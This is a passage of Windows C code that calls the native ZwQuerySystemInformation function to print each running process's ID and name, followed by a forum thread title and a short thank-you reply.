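            return NULL;
        }
        cb = (needed > cb) ? needed + 0x1000 : cb * 2;
        if (cb > PROC_LIST_MAX)
            return NULL;
    }
}

int main(void)
{
    HMODULE hNtDll = GetModuleHandleA("ntdll.dll");
    ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;
    PSYSTEM_PROCESS_INFORMATION pBuffer, pInfo;
    ULONG cbFilled = 0;
    PUCHAR pEnd;

    if (hNtDll != NULL)
        ZwQuerySystemInformation =
            (ZWQUERYSYSTEMINFORMATION)GetProcAddress(hNtDll, "ZwQuerySystemInformation");
    if (ZwQuerySystemInformation == NULL) {
        fprintf(stderr, "ntdll!ZwQuerySystemInformation not found\n");
        return -1;
    }

    pBuffer = QueryProcessList(ZwQuerySystemInformation, &cbFilled);
    if (pBuffer == NULL)
        return -1;

    pEnd = (PUCHAR)pBuffer + cbFilled;
    for (pInfo = pBuffer;;) {
        /* the fields we read (through ProcessId) must lie inside the filled region */
        if ((PUCHAR)pInfo + offsetof(SYSTEM_PROCESS_INFORMATION, InheritedFromProcessId) > pEnd) {
            fprintf(stderr, "process list truncated\n");
            break;
        }

        if (pInfo->ProcessName.Buffer == NULL)
            printf("PID:%lu \t(no name)\n", (unsigned long)pInfo->ProcessId);
        else
            printf("PID:%lu \t%.*ls\n", (unsigned long)pInfo->ProcessId,
                   (int)(pInfo->ProcessName.Length / sizeof(WCHAR)),
                   pInfo->ProcessName.Buffer);

        if (pInfo->NextEntryDelta == 0)
            break;
        pInfo = (PSYSTEM_PROCESS_INFORMATION)((PUCHAR)pInfo + pInfo->NextEntryDelta);
    }

    free(pBuffer);
    return 0;
}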
[分享]Overlay 最终版
恩好工具多谢啦 |